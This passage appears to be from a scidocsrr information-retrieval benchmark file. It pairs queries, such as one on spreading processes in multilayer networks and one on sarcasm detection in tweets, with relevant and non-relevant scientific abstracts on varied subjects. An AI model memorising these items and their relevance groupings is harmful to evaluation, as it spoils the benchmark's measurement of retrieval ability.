"text": "This paper presents the implementation of a complete fingerprint biometric cryptosystem in a Field Programmable Gate Array (FPGA). This is possible thanks to the use of a novel fingerprint feature, named QFingerMap, which is binary, length-fixed, and ordered. Security of Authentication on FPGA is further improved because information stored is protected due to the design of a cryptosystem based on Fuzzy Commitment. Several samples of fingers as well as passwords can be fused at feature level with codewords of an error correcting code to generate non-sensitive data. System performance is illustrated with experimental results corresponding to 560 fingerprints acquired in live by an optical sensor and processed by the system in a Xilinx Virtex 6 FPGA. Depending on the realization, more or less accuracy is obtained, being possible a perfect authentication (zero Equal Error Rate), with the advantages of real-time operation, low power consumption, and a very small device.",
"title": ""
},
{
"docid": "d24afbadfd207efc065be1e2f1fcd9bb",
"text": "Two-photon microscopy has enabled anatomical and functional fluorescence imaging in the intact brain of rats. Here, we extend two-photon imaging from anesthetized, head-stabilized to awake, freely moving animals by using a miniaturized head-mounted microscope. Excitation light is conducted to the microscope in a single-mode optical fiber, and images are scanned using vibrations of the fiber tip. Microscope performance was first characterized in the neocortex of anesthetized rats. We readily obtained images of vasculature filled with fluorescently labeled blood and of layer 2/3 pyramidal neurons filled with a calcium indicator. Capillary blood flow and dendritic calcium transients were measured with high time resolution using line scans. In awake, freely moving rats, stable imaging was possible except during sudden head movements.",
"title": ""
},
{
"docid": "47ee81ef9fb8a9bc792ee6edc9a2b503",
"text": "Current image captioning approaches generate descriptions which lack specific information, such as named entities that are involved in the images. In this paper we propose a new task which aims to generate informative image captions, given images and hashtags as input. We propose a simple but effective approach to tackle this problem. We first train a convolutional neural networks long short term memory networks (CNN-LSTM) model to generate a template caption based on the input image. Then we use a knowledge graph based collective inference algorithm to fill in the template with specific named entities retrieved via the hashtags. Experiments on a new benchmark dataset collected from Flickr show that our model generates news-style image descriptions with much richer information. Our model outperforms unimodal baselines significantly with various evaluation metrics.",
"title": ""
}
] | scidocsrr |
dd596c5c848c4d819475024a637283ec | The physics of spreading processes in multilayer networks | [
{
"docid": "714843ca4a3c99bfc95e89e4ff82aeb1",
"text": "The development of new technologies for mapping structural and functional brain connectivity has led to the creation of comprehensive network maps of neuronal circuits and systems. The architecture of these brain networks can be examined and analyzed with a large variety of graph theory tools. Methods for detecting modules, or network communities, are of particular interest because they uncover major building blocks or subnetworks that are particularly densely connected, often corresponding to specialized functional components. A large number of methods for community detection have become available and are now widely applied in network neuroscience. This article first surveys a number of these methods, with an emphasis on their advantages and shortcomings; then it summarizes major findings on the existence of modules in both structural and functional brain networks and briefly considers their potential functional roles in brain evolution, wiring minimization, and the emergence of functional specialization and complex dynamics.",
"title": ""
},
{
"docid": "1fa6a26cc633adcab0f337292f84c948",
"text": "Several systems can be modeled as sets of interconnected networks or networks with multiple types of connections, here generally called multilayer networks. Spreading processes such as information propagation among users of online social networks, or the diffusion of pathogens among individuals through their contact network, are fundamental phenomena occurring in these networks. However, while information diffusion in single networks has received considerable attention from various disciplines for over a decade, spreading processes in multilayer networks is still a young research area presenting many challenging research issues. In this paper, we review the main models, results and applications of multilayer spreading processes and discuss some promising research directions.",
"title": ""
}
] | [
{
"docid": "e16213450f2094ebf1a8a77a98e4426b",
"text": "We explore the design and implementation of Frank, a strict functional programming language with a bidirectional effect type system designed from the ground up around a novel variant of Plotkin and Pretnar's effect handler abstraction. \n Effect handlers provide an abstraction for modular effectful programming: a handler acts as an interpreter for a collection of commands whose interfaces are statically tracked by the type system. However, Frank eliminates the need for an additional effect handling construct by generalising the basic mechanism of functional abstraction itself. A function is simply the special case of a Frank operator that interprets no commands. Moreover, Frank's operators can be multihandlers which simultaneously interpret commands from several sources at once, without disturbing the direct style of functional programming with values. \n Effect typing in Frank employs a novel form of effect polymorphism which avoid mentioning effect variables in source code. This is achieved by propagating an ambient ability inwards, rather than accumulating unions of potential effects outwards. \n We introduce Frank by example, and then give a formal account of the Frank type system and its semantics. We introduce Core Frank by elaborating Frank operators into functions, case expressions, and unary handlers, and then give a sound small-step operational semantics for Core Frank. \n Programming with effects and handlers is in its infancy. We contribute an exploration of future possibilities, particularly in combination with other forms of rich type system.",
"title": ""
},
{
"docid": "2ea6addaae9187d69166ab2694f9e633",
"text": "Convolutional neural networks are increasingly used outside the domain of image analysis, in particular in various areas of the natural sciences concerned with spatial data. Such networks often work out-of-the box, and in some cases entire model architectures from image analysis can be carried over to other problem domains almost unaltered. Unfortunately, this convenience does not trivially extend to data in non-euclidean spaces, such as spherical data. In this paper, we introduce two strategies for conducting convolutions on the sphere, using either a spherical-polar grid or a grid based on the cubed-sphere representation. We investigate the challenges that arise in this setting, and extend our discussion to include scenarios of spherical volumes, with several strategies for parameterizing the radial dimension. As a proof of concept, we conclude with an assessment of the performance of spherical convolutions in the context of molecular modelling, by considering structural environments within proteins. We show that the models are capable of learning non-trivial functions in these molecular environments, and that our spherical convolutions generally outperform standard 3D convolutions in this setting. In particular, despite the lack of any domain specific feature-engineering, we demonstrate performance comparable to state-of-the-art methods in the field, which build on decades of domain-specific knowledge.",
"title": ""
},
{
"docid": "63afe9cba04e97ef43bfd699d63232e3",
"text": "BACKGROUND\nMicroglial activation is a hallmark of neuroinflammation, seen in most acute and chronic neuropsychiatric conditions. With growing knowledge about microglia functions in surveying the brain for alterations, microglial activation is increasingly discussed in the context of disease progression and pathogenesis of Alzheimer's disease (AD). Underlying molecular mechanisms, however, remain largely unclear. While proper microglial function is essentially required for its scavenging duties, local activation of the brain's innate immune cells also brings about many less advantageous changes, such as reactive oxygen species (ROS) production, secretion of proinflammatory cytokines or degradation of neuroprotective retinoids, and may thus unnecessarily put surrounding healthy neurons in danger. In view of this dilemma, it is little surprising that both, AD vaccination trials, and also immunosuppressive strategies have consistently failed in AD patients. Nevertheless, epidemiological evidence has suggested a protective effect for anti-inflammatory agents, supporting the hypothesis that key processes involved in the pathogenesis of AD may take place rather early in the time course of the disorder, likely long before memory impairment becomes clinically evident. Activation of microglia results in a severely altered microenvironment. This is not only caused by the plethora of secreted cytokines, chemokines or ROS, but may also involve increased turnover of neuroprotective endogenous substances such as retinoic acid (RA), as recently shown in vitro.\n\n\nRESULTS\nWe discuss findings linking microglial activation and AD and speculate that microglial malfunction, which brings about changes in local RA concentrations in vitro, may underlie AD pathogenesis and precede or facilitate the onset of AD. Thus, chronic, \"innate neuroinflammation\" may provide a valuable target for preventive and therapeutic strategies.",
"title": ""
},
{
"docid": "8f5ca16c82dfdb7d551fdf203c9ebf7a",
"text": "We analyze a few of the commonly used statistics based and machine learning algorithms for natural language disambiguation tasks and observe that they can bc recast as learning linear separators in the feature space. Each of the methods makes a priori assumptions, which it employs, given the data, when searching for its hypothesis. Nevertheless, as we show, it searches a space that is as rich as the space of all linear separators. We use this to build an argument for a data driven approach which merely searches for a good linear separator in the feature space, without further assumptions on the domain or a specific problem. We present such an approach a sparse network of linear separators, utilizing the Winnow learning aigorlthrn and show how to use it in a variety of ambiguity resolution problems. The learning approach presented is attribute-efficient and, therefore, appropriate for domains having very large number of attributes. In particular, we present an extensive experimental comparison of our approach with other methods on several well studied lexical disambiguation tasks such as context-sensltlve spelling correction, prepositional phrase attachment and part of speech tagging. In all cases we show that our approach either outperforms other methods tried for these tasks or performs comparably to the best.",
"title": ""
},
{
"docid": "bcd0474289ba78d44853b5d278c1d2a9",
"text": "Manifold Learning (ML) is a class of algorithms seeking a low-dimensional non-linear representation of high-dimensional data. Thus, ML algorithms are most applicable to highdimensional data and require large sample sizes to accurately estimate the manifold. Despite this, most existing manifold learning implementations are not particularly scalable. Here we present a Python package that implements a variety of manifold learning algorithms in a modular and scalable fashion, using fast approximate neighbors searches and fast sparse eigendecompositions. The package incorporates theoretical advances in manifold learning, such as the unbiased Laplacian estimator introduced by Coifman and Lafon (2006) and the estimation of the embedding distortion by the Riemannian metric method introduced by Perrault-Joncas and Meila (2013). In benchmarks, even on a single-core desktop computer, our code embeds millions of data points in minutes, and takes just 200 minutes to embed the main sample of galaxy spectra from the Sloan Digital Sky Survey— consisting of 0.6 million samples in 3750-dimensions—a task which has not previously been possible.",
"title": ""
},
{
"docid": "803b681a89e6f3db34061c4b26fc2cd5",
"text": "T cells redirected to specific antigen targets with engineered chimeric antigen receptors (CARs) are emerging as powerful therapies in hematologic malignancies. Various CAR designs, manufacturing processes, and study populations, among other variables, have been tested and reported in over 10 clinical trials. Here, we review and compare the results of the reported clinical trials and discuss the progress and key emerging factors that may play a role in effecting tumor responses. We also discuss the outlook for CAR T-cell therapies, including managing toxicities and expanding the availability of personalized cell therapy as a promising approach to all hematologic malignancies. Many questions remain in the field of CAR T cells directed to hematologic malignancies, but the encouraging response rates pave a wide road for future investigation.",
"title": ""
},
{
"docid": "a1e2244c7ec4b489ac7714b47a045bb6",
"text": "In this paper we introduce a new connectionist approach to on-line handwriting recognition and address in particular the problem of recognizing handwritten whiteboard notes. The approach uses a bidirectional recurrent neural network with long short-term memory blocks. We use a recently introduced objective function, known as Connectionist Temporal Classification (CTC), that directly trains the network to label unsegmented sequence data. Our new system achieves a word recognition rate of 74.0 %, compared with 65.4 % using a previously developed HMMbased recognition system.",
"title": ""
},
{
"docid": "e2e47bef900599b0d7b168e02acf7e88",
"text": "Reflection seismic data from the F3 block in the Dutch North Sea exhibits many largeamplitude reflections at shallow horizons, typically categorized as “brightspots ” (Schroot and Schuttenhelm, 2003), mainly because of their bright appearance. In most cases, these bright reflections show a significant “flatness” contrasting with local structural trends. While flatspots are often easily identified in thick reservoirs, we have often occasionally observed apparent flatspot tuning effects at fluid contacts near reservoir edges and in thin reservoir beds, while only poorly understanding them. We conclude that many of the shallow large-amplitude reflections in block F3 are dominated by flatspots, and we investigate the thin-bed tuning effects that such flatspots cause as they interact with the reflection from the reservoir’s upper boundary. There are two possible effects to be considered: (1) the “wedge-model” tuning effects of the flatspot and overlying brightspots, dimspots, or polarity-reversals; and (2) the stacking effects that result from possible inclusion of post-critical flatspot reflections in these shallow sands. We modeled the effects of these two phenomena for the particular stratigraphic sequence in block F3. Our results suggest that stacking of post-critical flatspot reflections can cause similar large-amplitude but flat reflections, in some cases even causing an interface expected to produce a ‘dimspot’ to appear as a ‘brightspot’. Analysis of NMO stretch and muting shows the likely exclusion of critical offset data in stacked output. If post-critical reflections are included in stacking, unusual results will be observed. In the North Sea case, we conclude the tuning effect was the primary reason causing for the brightness and flatness of these reflections. However, it is still important to note that care should be taken while applying muting on reflections with wide range of incidence angles and the inclusion of critical offset data may cause some spurious features in the stacked section.",
"title": ""
},
{
"docid": "ad637c2f2257d129fa41733c9a4ca6e5",
"text": "OBJECTIVE\nTo examine the multivariate nature of risk factors for youth violence including delinquent peer associations, exposure to domestic violence in the home, family conflict, neighborhood stress, antisocial personality traits, depression level, and exposure to television and video game violence.\n\n\nSTUDY DESIGN\nA population of 603 predominantly Hispanic children (ages 10-14 years) and their parents or guardians responded to multiple behavioral measures. Outcomes included aggression and rule-breaking behavior on the Child Behavior Checklist (CBCL), as well as violent and nonviolent criminal activity and bullying behavior.\n\n\nRESULTS\nDelinquent peer influences, antisocial personality traits, depression, and parents/guardians who use psychological abuse in intimate relationships were consistent risk factors for youth violence and aggression. Neighborhood quality, parental use of domestic violence in intimate relationships, and exposure to violent television or video games were not predictive of youth violence and aggression.\n\n\nCONCLUSION\nChildhood depression, delinquent peer association, and parental use of psychological abuse may be particularly fruitful avenues for future prevention or intervention efforts.",
"title": ""
},
{
"docid": "60f94e4336d8e406097dd880f8054089",
"text": "In order to improve the retrieval accuracy of content-based image retrieval systems, research focus has been shifted from designing sophisticated low-level feature extraction algorithms to reducing the ‘semantic gap’ between the visual features and the richness of human semantics. This paper attempts to provide a comprehensive survey of the recent technical achievements in high-level semantic-based image retrieval. Major recent publications are included in this survey covering different aspects of the research in this area, including low-level image feature extraction, similarity measurement, and deriving high-level semantic features. We identify five major categories of the state-of-the-art techniques in narrowing down the ‘semantic gap’: (1) using object ontology to define high-level concepts; (2) using machine learning methods to associate low-level features with query concepts; (3) using relevance feedback to learn users’ intention; (4) generating semantic template to support high-level image retrieval; (5) fusing the evidences from HTML text and the visual content of images for WWW image retrieval. In addition, some other related issues such as image test bed and retrieval performance evaluation are also discussed. Finally, based on existing technology and the demand from real-world applications, a few promising future research directions are suggested. 2006 Pattern Recognition Society. Published by Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "eab5e6b1cf3df1d9141f9192cf59d753",
"text": "Horse racing is a popular sport in Mauritius which attracts huge crowds to Champ de Mars. Nevertheless, bettors face many difficulties in predicting winning horses to make profit. The principal factors affecting a race were determined. Each factor, namely jockeys, new horses, favourite horses, previous performance, draw, type of horses, weight, rating and stable have been examined and appropriate weights have been assigned to each of them depending on their importance. Furthermore, data for the whole racing season of 2010 was considered. The results of 240 races of 2010 have been used to determine the degree to which each factor affect the chance of each horse. The weights were then summed up to predict winners. The system can predict winners with an accuracy of 58% which is 4. 7 out of 8 winners on average. The software outperformed the predictions made by the best professional tipsters in Mauritius who could forecast only 3. 6 winners out of 8 races.",
"title": ""
},
{
"docid": "ee4288bcddc046ae5e9bcc330264dc4f",
"text": "Emerging recognition of two fundamental errors underpinning past polices for natural resource issues heralds awareness of the need for a worldwide fundamental change in thinking and in practice of environmental management. The first error has been an implicit assumption that ecosystem responses to human use are linear, predictable and controllable. The second has been an assumption that human and natural systems can be treated independently. However, evidence that has been accumulating in diverse regions all over the world suggests that natural and social systems behave in nonlinear ways, exhibit marked thresholds in their dynamics, and that social-ecological systems act as strongly coupled, complex and evolving integrated systems. This article is a summary of a report prepared on behalf of the Environmental Advisory Council to the Swedish Government, as input to the process of the World Summit on Sustainable Development (WSSD) in Johannesburg, South Africa in 26 August 4 September 2002. We use the concept of resilience--the capacity to buffer change, learn and develop--as a framework for understanding how to sustain and enhance adaptive capacity in a complex world of rapid transformations. Two useful tools for resilience-building in social-ecological systems are structured scenarios and active adaptive management. These tools require and facilitate a social context with flexible and open institutions and multi-level governance systems that allow for learning and increase adaptive capacity without foreclosing future development options.",
"title": ""
},
{
"docid": "eae289c213d5b67d91bb0f461edae7af",
"text": "China has made remarkable progress in its war against poverty since the launching of economic reform in the late 1970s. This paper examines some of the major driving forces of poverty reduction in China. Based on time series and cross-sectional provincial data, the determinants of rural poverty incidence are estimated. The results show that economic growth is an essential and necessary condition for nationwide poverty reduction. It is not, however, a sufficient condition. While economic growth played a dominant role in reducing poverty through the mid-1990s, its impacts has diminished since that time. Beyond general economic growth, growth in specific sectors of the economy is also found to reduce poverty. For example, the growth the agricultural sector and other pro-rural (vs urban-biased) development efforts can also have significant impacts on rural poverty. Notwithstanding the record of the past, our paper is consistent with the idea that poverty reduction in the future will need to rely on more than broad-based growth and instead be dependent on pro-poor policy interventions (such as national poverty alleviation programs) that can be targeted at the poor, trying to directly help the poor to increase their human capital and incomes. Determinants of Rural Poverty Reduction and Pro-poor Economic Growth in China",
"title": ""
},
{
"docid": "f6631be10fe8bbc7834ffa512906f47e",
"text": "A recent theory (Roseman, 1979,1984) attempts to specify the particular appraisals of events that elicit 16 discrete emotions. This study tested hypotheses from the latest version of the theory and compared them with hypotheses derived from appraisal theories proposed by Arnold (1960) and by Scherer (1988), using procedures designed to address some prior methodological problems. Results provided empirical support for numerous hypotheses linking particular appraisals of situational state (motive-inconsistent/motive-consistent), motivational state (punishment/reward), probability (uncertain/certain), power (weak/strong), legitimacy (negative outcome deserved/positive outcome deserved), and agency (circumstances/other person/self) to particular emotions. Where hypotheses were not supported, new appraisal-emotion relationships that revise the theory were proposed.",
"title": ""
},
{
"docid": "79f10f0b7da7710ce68d9df6212579b6",
"text": "The Internet is probably the most successful distributed computing system ever. However, our capabilities for data querying and manipulation on the internet are primordial at best. The user expectations are enhancing over the period of time along with increased amount of operational data past few decades. The data-user expects more deep, exact, and detailed results. Result retrieval for the user query is always relative o the pattern of data storage and index. In Information retrieval systems, tokenization is an integrals part whose prime objective is to identifying the token and their count. In this paper, we have proposed an effective tokenization approach which is based on training vector and result shows that efficiency/ effectiveness of proposed algorithm. Tokenization on documents helps to satisfy user’s information need more precisely and reduced search sharply, is believed to be a part of information retrieval. Pre-processing of input document is an integral part of Tokenization, which involves preprocessing of documents and generates its respective tokens which is the basis of these tokens probabilistic IR generate its scoring and gives reduced search space. The comparative analysis is based on the two parameters; Number of Token generated, Pre-processing time.",
"title": ""
},
{
"docid": "d2ee5b1556fda989e1e1a0837dfea682",
"text": "This work proposes a novel person re-identification method based on Hierarchical Bipartite Graph Matching. Because human eyes observe person appearance roughly first and then goes further into the details gradually, our method abstracts person image from coarse to fine granularity, and finally into a three layer tree structure. Then, three bipartite graph matching methods are proposed for the matching of each layer between the trees. At the bottom layer Non-complete Bipartite Graph matching is proposed to collect matching pairs among small local regions. At the middle layer Semi-complete Bipartite Graph matching is used to deal with the problem of spatial misalignment between two person bodies. Complete Bipartite Graph matching is presented to refine the ranking result at the top layer. The effectiveness of our method is validated on the CAVIAR4REID and VIPeR datasets, and competitive results are achieved on both datasets.",
"title": ""
},
{
"docid": "f6abaaeb06709e20122ef3fe07a88894",
"text": "BACKGROUND\nBullying is a problem in schools in many countries. There would be a benefit in the availability of a psychometrically sound instrument for its measurement, for use by teachers and researchers. The Olweus Bully/Victim Questionnaire has been used in a number of studies but comprehensive evidence on its validity is not available.\n\n\nAIMS\nTo examine the conceptual design, construct validity and reliability of the Revised Olweus Bully/Victim Questionnaire (OBVQ) and to provide further evidence on the prevalence of different forms of bullying behaviour.\n\n\nSAMPLE\nAll 335 pupils (160 [47.8%] girls; 175 [52.2%]) boys, mean age 11.9 years [range 11.2-12.8 years]), in 21 classes of a stratified sample of 7 Greek Cypriot primary schools.\n\n\nMETHOD\nThe OBVQ was administered to the sample. Separate scales were created comprising (a) the items of the questionnaire concerning the extent to which pupils are being victimized; and (b) those concerning the extent to which pupils express bullying behaviour. Using the Rasch model, both scales were analysed for reliability, fit to the model, meaning, and validity. Both scales were also analysed separately for each of two sample groups (i.e. boys and girls) to test their invariance.\n\n\nRESULTS\nAnalysis of the data revealed that the instrument has satisfactory psychometric properties; namely, construct validity and reliability. The conceptual design of the instrument was also confirmed. The analysis leads also to suggestions for improving the targeting of items against student measures. Support was also provided for the relative prevalence of verbal, indirect and physical bullying. As in other countries, Cypriot boys used and experienced more bullying than girls, and boys used more physical and less indirect forms of bullying than girls.\n\n\nCONCLUSIONS\nThe OBVQ is a psychometrically sound instrument that measures two separate aspects of bullying, and whose use is supported for international studies of bullying in different countries. However, improvements to the questionnaire were also identified to provide increased usefulness to teachers tackling this significant problem facing schools in many countries.",
"title": ""
},
{
"docid": "225c54aa742d510876a413ff66804b46",
"text": "Various models and derived measures of arterial function have been proposed to describe and quantify pulsatile hemodynamics in humans. A major distinction can be drawn between lumped models based on circuit theory that assume infinite pulse wave velocity versus distributed, propagative models based on transmission line theory that acknowledge finite wave velocity and account for delays, wave reflection, and spatial and temporal pressure gradients within the arterial system. Although both approaches have produced useful insights into human arterial pathophysiology, there are important limitations of the lumped approach. The arterial system is heterogeneous and various segments respond differently to cardiovascular disease risk factors including advancing age. Lumping divergent change into aggregate summary variables can obscure abnormalities in regional arterial function. Analysis of a limited number of summary variables obtained by measuring aortic input impedance may provide novel insights and inform development of new treatments aimed at preventing or reversing abnormal pulsatile hemodynamics.",
"title": ""
},
{
"docid": "da302043eecd427e70c48c28df189aa3",
"text": "Recent advances in electronics and wireless communication technologies have enabled the development of large-scale wireless sensor networks that consist of many low-power, low-cost, and small-size sensor nodes. Sensor networks hold the promise of facilitating large-scale and real-time data processing in complex environments. Security is critical for many sensor network applications, such as military target tracking and security monitoring. To provide security and privacy to small sensor nodes is challenging, due to the limited capabilities of sensor nodes in terms of computation, communication, memory/storage, and energy supply. In this article we survey the state of the art in research on sensor network security.",
"title": ""
}
] | scidocsrr |
817aa1a372f8c7653c24483d1d8bb9fb | Parsing-based sarcasm sentiment recognition in Twitter data | [
{
"docid": "d6cca63107e04f225b66e02289c601a2",
"text": "To avoid a sarcastic message being understood in its unintended literal meaning, in microtexts such as messages on Twitter.com sarcasm is often explicitly marked with a hashtag such as ‘#sarcasm’. We collected a training corpus of about 406 thousand Dutch tweets with hashtag synonyms denoting sarcasm. Assuming that the human labeling is correct (annotation of a sample indicates that about 90% of these tweets are indeed sarcastic), we train a machine learning classifier on the harvested examples, and apply it to a sample of a day’s stream of 2.25 million Dutch tweets. Of the 353 explicitly marked tweets on this day, we detect 309 (87%) with the hashtag removed. We annotate the top of the ranked list of tweets most likely to be sarcastic that do not have the explicit hashtag. 35% of the top250 ranked tweets are indeed sarcastic. Analysis indicates that the use of hashtags reduces the further use of linguistic markers for signaling sarcasm, such as exclamations and intensifiers. We hypothesize that explicit markers such as hashtags are the digital extralinguistic equivalent of non-verbal expressions that people employ in live interaction when conveying sarcasm. Checking the consistency of our finding in a language from another language family, we observe that in French the hashtag ‘#sarcasme’ has a similar polarity switching function, be it to a lesser extent. 2014 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "0f84e488b0e0b18e829aee14213dcebe",
"text": "The ability to reliably identify sarcasm and irony in text can improve the perfo rmance of many Natural Language Processing (NLP) systems including summarization, sentiment analysis, etc. The existing sar casm detection systems have focused on identifying sarcasm on a sentence level or for a specific phrase. However, often it is impos sible to identify a sentence containing sarcasm without knowing the context. In this paper we describe a corpus generation experiment w h re e collect regular and sarcastic Amazon product reviews. We perform qualitative and quantitative analysis of the corpus. The resu lting corpus can be used for identifying sarcasm on two levels: a document and a text utterance (where a text utterance can be as short as a sentence and as long as a whole document).",
"title": ""
},
{
"docid": "2314e101f501a328e3600a73dd4ee898",
"text": "Sarcasm transforms the polarity of an apparently positive or negative utterance into its opposite. We report on a method for constructing a corpus of sarcastic Twitter messages in which determination of the sarcasm of each message has been made by its author. We use this reliable corpus to compare sarcastic utterances in Twitter to utterances that express positive or negative attitudes without sarcasm. We investigate the impact of lexical and pragmatic factors on machine learning effectiveness for identifying sarcastic utterances and we compare the performance of machine learning techniques and human judges on this task. Perhaps unsurprisingly, neither the human judges nor the machine learning techniques perform very well.",
"title": ""
},
{
"docid": "79526907e23dd774c39af7398e1dcd42",
"text": "Automatic detection of emotions like sarcasm or nastiness in online written conversation is a difficult task. It requires a system that can manage some kind of knowledge to interpret that emotional language is being used. In this work, we try to provide this knowledge to the system by considering alternative sets of features obtained according to different criteria. We test a range of different feature sets using two different classifiers. Our results show that the sarcasm detection task benefits from the inclusion of linguistic and semantic information sources, while nasty language is more easily detected using only a set of surface patterns or indicators. 2014 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "2a09d97b350fa249fc6d4bbf641697e2",
"text": "The goal of this study was to investigate the effect of lead and the influence of chelating agents,meso 2, 3-dimercaptosuccinic acid (DMSA) and D-Penicillamine, on the biochemical contents of the brain tissues of Catla catla fingerlings by Fourier Transform Infrared Spectroscopy. FT-IR spectra revealed significant differences in absorbance intensities between control and lead-intoxicated brain tissues, reflecting a change in protein and lipid contents in the brain tissues due to lead toxicity. In addition, the administration of chelating agents, DMSA and D-Penicillamine, improved the protein and lipid contents in the brain tissues compared to lead-intoxicated tissues. Further, DMSA was more effective in reducing the body burden of lead. The protein secondary structure analysis revealed that lead intoxication causes an alteration in protein profile with a decrease in α-helix and an increase in β-sheet structure of Catla catla brain. In conclusion, the study demonstrated that FT-IR spectroscopy could differentiate the normal and lead-intoxicated brain tissues due to intrinsic differences in intensity.",
"title": ""
},
{
"docid": "52f6e2d0ce0923f923293e2c154fb08c",
"text": "We present a novel Dynamic Bayesian Network for pedestrian path prediction in the intelligent vehicle domain. The model incorporates the pedestrian situational awareness, situation criticality and spatial layout of the environment as latent states on top of a Switching Linear Dynamical System (SLDS) to anticipate changes in the pedestrian dynamics. Using computer vision, situational awareness is assessed by the pedestrian head orientation, situation criticality by the distance between vehicle and pedestrian at the expected point of closest approach, and spatial layout by the distance of the pedestrian to the curbside. Our particular scenario is that of a crossing pedestrian, who might stop or continue walking at the curb. In experiments using stereo vision data obtained from a vehicle, we demonstrate that the proposed approach results in more accurate path prediction than only SLDS, at the relevant short time horizon (1 s), and slightly outperforms a computationally more demanding state-of-the-art method.",
"title": ""
},
{
"docid": "db31a8887bfc1b24c2d2c2177d4ef519",
"text": "The equilibrium microstructure of a fluid may only be described exactly in terms of a complete set of n-body atomic distribution functions, where n is 1, 2, 3 , . . . , N, and N is the total number of particles in the system. The higher order functions, i. e. n > 2, are complex and practically inaccessible but con siderable qualitative information can already be derived from studies of the mean radial occupation function n(r) defined as the average number of atoms in a sphere of radius r centred on a particular atom. The function for a perfect gas of non-inter acting particles is",
"title": ""
},
{
"docid": "c1d436c01088c2295b35a1a37e922bee",
"text": "Tourism is an important part of national economy. On the other hand it can also be a source of some negative externalities. These are mainly environmental externalities, resulting in increased pollution, aesthetic or architectural damages. High concentration of visitors may also lead to increased crime, or aggressiveness. These may have negative effects on quality of life of residents and negative experience of visitors. The paper deals with the influence of tourism on destination environment. It highlights the necessity of sustainable forms of tourism and activities to prevent negative implication of tourism, such as education activities and tourism monitoring. Key-words: Tourism, Mass Tourism, Development, Sustainability, Tourism Impact, Monitoring.",
"title": ""
},
{
"docid": "2bab927c0e06da044bd0e8dea3b832a9",
"text": "R is a popular language and programming environment for data scientists. It is increasingly co-packaged with both relational and Hadoop-based data platforms and can often be the most dominant computational component in data analytics pipelines. Recent work has highlighted inefficiencies in executing R programs, both in terms of execution time and memory requirements, which in practice limit the size of data that can be analyzed by R. This paper presents ROSA, a static analysis framework to improve the performance and space efficiency of R programs. ROSA analyzes input programs to determine program properties such as reaching definitions, live variables, aliased variables, and types of variables. These inferred properties enable program transformations such as C++ code translation, strength reduction, vectorization, code motion, in addition to interpretive optimizations such as avoiding redundant object copies and performing in-place evaluations. An empirical evaluation shows substantial reductions by ROSA in execution time and memory consumption over both CRAN R and Microsoft R Open.",
"title": ""
},
{
"docid": "c967b56cc7a2046cb34cfea25dd702d7",
"text": "We present GJ, a design that extends the Java programming language with generic types and methods. These are both explained and implemented by translation into the unextended language. The translation closely mimics the way generics are emulated by programmers: it erases all type parameters, maps type variables to their bounds, and inserts casts where needed. Some subtleties of the translation are caused by the handling of overriding.GJ increases expressiveness and safety: code utilizing generic libraries is no longer buried under a plethora of casts, and the corresponding casts inserted by the translation are guaranteed to not fail.GJ is designed to be fully backwards compatible with the current Java language, which simplifies the transition from non-generic to generic programming. In particular, one can retrofit existing library classes with generic interfaces without changing their code.An implementation of GJ has been written in GJ, and is freely available on the web.",
"title": ""
},
{
"docid": "b51d531c2ff106124f96a4287e466b90",
"text": "Detecting buildings from very high resolution (VHR) aerial and satellite images is extremely useful in map making, urban planning, and land use analysis. Although it is possible to manually locate buildings from these VHR images, this operation may not be robust and fast. Therefore, automated systems to detect buildings from VHR aerial and satellite images are needed. Unfortunately, such systems must cope with major problems. First, buildings have diverse characteristics, and their appearance (illumination, viewing angle, etc.) is uncontrolled in these images. Second, buildings in urban areas are generally dense and complex. It is hard to detect separate buildings from them. To overcome these difficulties, we propose a novel building detection method using local feature vectors and a probabilistic framework. We first introduce four different local feature vector extraction methods. Extracted local feature vectors serve as observations of the probability density function (pdf) to be estimated. Using a variable-kernel density estimation method, we estimate the corresponding pdf. In other words, we represent building locations (to be detected) in the image as joint random variables and estimate their pdf. Using the modes of the estimated density, as well as other probabilistic properties, we detect building locations in the image. We also introduce data and decision fusion methods based on our probabilistic framework to detect building locations. We pick certain crops of VHR panchromatic aerial and Ikonos satellite images to test our method. We assume that these crops are detected using our previous urban region detection method. Our test images are acquired by two different sensors, and they have different spatial resolutions. Also, buildings in these images have diverse characteristics. Therefore, we can test our methods on a diverse data set. Extensive tests indicate that our method can be used to automatically detect buildings in a robust and fast manner in Ikonos satellite and our aerial images.",
"title": ""
},
{
"docid": "81c6c8572f34d4ba431ed8bca3df5f83",
"text": "Inspired by the compliance found in many organisms, soft robots are made almost entirely out of flexible, soft material, making them suitable for applications in uncertain, dynamic task environments, including safe human-robot interactions. Their intrinsic compliance absorbs shocks and protects them against mechanical impacts. However, the soft materials used for their construction are highly susceptible to damage, such as cuts and perforations caused by sharp objects present in the uncontrolled and unpredictable environments they operate in. In this research, we propose to construct soft robotics entirely out of self-healing elastomers. On the basis of healing capacities found in nature, these polymers are given the ability to heal microscopic and macroscopic damage. Diels-Alder polymers, being thermoreversible covalent networks, were used to develop three applications of self-healing soft pneumatic actuators (a soft gripper, a soft hand, and artificial muscles). Soft pneumatic actuators commonly experience perforations and leaks due to excessive pressures or wear during operation. All three prototypes were designed using finite element modeling and mechanically characterized. The manufacturing method of the actuators exploits the self-healing behavior of the materials, which can be recycled. Realistic macroscopic damage could be healed entirely using a mild heat treatment. At the location of the scar, no weak spots were created, and the full performance of the actuators was nearly completely recovered after healing.",
"title": ""
},
{
"docid": "0d6960b2817f98924f7de3b7d7774912",
"text": "Visual textures have played a key role in image understanding because they convey important semantics of images, and because texture representations that pool local image descriptors in an orderless manner have had a tremendous impact in diverse applications. In this paper we make several contributions to texture understanding. First, instead of focusing on texture instance and material category recognition, we propose a human-interpretable vocabulary of texture attributes to describe common texture patterns, complemented by a new describable texture dataset for benchmarking. Second, we look at the problem of recognizing materials and texture attributes in realistic imaging conditions, including when textures appear in clutter, developing corresponding benchmarks on top of the recently proposed OpenSurfaces dataset. Third, we revisit classic texture represenations, including bag-of-visual-words and the Fisher vectors, in the context of deep learning and show that these have excellent efficiency and generalization properties if the convolutional layers of a deep model are used as filter banks. We obtain in this manner state-of-the-art performance in numerous datasets well beyond textures, an efficient method to apply deep features to image regions, as well as benefit in transferring features from one domain to another.",
"title": ""
},
{
"docid": "c6dd1546b19703a69bc25f3a881d783b",
